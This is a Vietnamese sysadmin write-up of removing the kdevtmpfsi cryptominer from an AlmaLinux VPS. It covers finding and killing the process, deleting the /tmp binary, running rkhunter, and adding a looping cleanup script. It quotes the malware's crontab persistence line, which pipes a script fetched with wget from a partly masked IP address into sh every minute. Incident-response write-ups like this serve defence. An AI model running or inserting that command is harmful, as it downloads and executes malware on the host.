Nay tự nhiên bị full 100% CPU, một lúc sau thì nhà cung cấp suppend mình luôn, nhờ họ bật lại và bắt đầu xử lý
Bước 1: Cài đặt cpulimit trên AlmaLinux nhằm giới hạn CPU
Cài đặt kho EPEL (Extra Packages for Enterprise Linux):
sudo yum install epel-releaseCài đặt cpulimit:
sudo yum install cpulimitBước 2: Xác định tiến trình đang tiêu tốn CPU
topTìm PID của tiến trình tiêu tốn CPU nhất hoặc tên của chương trình đó.
Tìm ra
2040 root 20 0 2879232 8396 0 S 386.4 0.1 17:55.60 kdevtmpfsi
1850 sotai25+ 21 1 649156 63072 47716 S 2.7 0.8 0:01.84 lsphp
1752 sotai25+ 21 1 651264 66676 49224 S 2.0 0.8 0:02.90 lsphp
1754 sotai25+ 21 1 651212 62732 47388 S 2.0 0.8 0:01.96 lsphp
789 mysql 20 0 2063380 261476 24132 S 1.7 3.3 0:06.75 mariadbd
708 root 20 0 380844 20448 15972 S 0.7 0.3 0:04.23 NetworkManager
1837 cyberpa+ 21 1 210272 77220 9912 S 0.7 1.0 0:02.11 lswsgi
1 root 20 0 238320 10884 8200 S 0.3 0.1 0:01.59 systemd
724 redis 20 0 53628 9868 3416 S 0.3 0.1 0:00.45 redis-server
1497 nobody 20 0 172756 23512 17788 S 0.3 0.3 0:00.65 litespeed
1500 nobody 20 0 172720 22764 17100 S 0.3 0.3 0:00.57 litespeed
1756 sotai25+ 21 1 649168 62512 49168 S 0.3 0.8 0:01.86 lsphp
1836 cyberpa+ 21 1 210712 77404 9968 S 0.3 1.0 0:02.62 lswsgi
1845 fptte39+ 21 1 590772 95216 67620 S 0.3 1.2 0:03.93 lsphp
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 rcu_gp
4 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 rcu_par_gpThấy kdevtmpfsi tiến trình cao
Kill nó đi đã
kill -9 2040Sau đó tìm nó là gì ( tìm hai ba lầ mới ra) Nếu tìm thấy tệp này ở các vị trí đáng ngờ (như /tmp/), xóa nó ngay:
find / -name "kdevtmpfsi"và tìm thấy là /tmp/kdevtmpfsi
Lập lệnh xóa nó đi
rm -f /tmp/kdevtmpfsiBước 3: Cài phần mềm xóa mã độc Sử dụng rkhunter hoặc chkrootkit để quét và phát hiện mã độc tiềm ẩn:
yum install rkhunter
rkhunter --checkBổ sung:
Bổ sung
Sau khi tìm tìm tự nhiên vô tình vào cratab thì thấy
sudo EDITOR=nano crontab -e
7 0 * * * "/root/.acme.sh"/acme.sh --cron --home "/root/.acme.sh" > /dev/null
*/3 * * * * if ! find /home/*/public_html/ -maxdepth 2 -type f -newer /usr/local/lsws/cgid -name '.htaccess' -exec false {} +; then systemctl restart lsws; fi
09,39 * * * * /usr/local/CyberCP/bin/cleansessions >/dev/null 2>&1
* * * * * wget -q -O - http://185.122.204.xxx/unk.sh | sh > /dev/null 2>&1Và nó chính là dòng * * * * wget -q -O – http://185.122.204.xxx/unk.sh | sh > /dev/null 2>&1 > đại loại nó tự động dùng wget để tải về mã độc kia, nên xóa cũng bị tải lại ngay sau một thời gian. > xóa dòng này đi nhé
ok, hoàn thiện rồi, !
Xử lý mã độc kdevtmpfsi tạm thời
Mã độc kdevtmpfsi là con khá nổi tiếng, vì thế bạn cũng có thể dễ dàng tìm kiếm được thông tin, ngoài ra sẽ bổ sung là
vào ssh VPS đang sử dụng tạo tệp bash
nano xoamadoc.shNội dung xoamadoc.sh là
#!/bin/bash
while true; do
# Kiểm tra và xóa tiến trình kdevtmpfsi
if pgrep kdevtmpfsi > /dev/null; then
sudo kill -9 $(pgrep kdevtmpfsi)
fi
# Tìm và xóa tất cả các tệp có tên kdevtmpfsi
sudo find / -name "kdevtmpfsi" -exec rm -f {} \;
# Chờ 1 giây trước khi lặp lại
sleep 1
done
Ctrl x, y Enter ( lưu)
Phân quyền cho nó
chmod +x xoamadoc.shCho nó chạy nền
nohup /bin/bash /root/xoamadoc.sh &
Kiểm tra xem chạy chưa
pgrep -fl xoamadoc.sh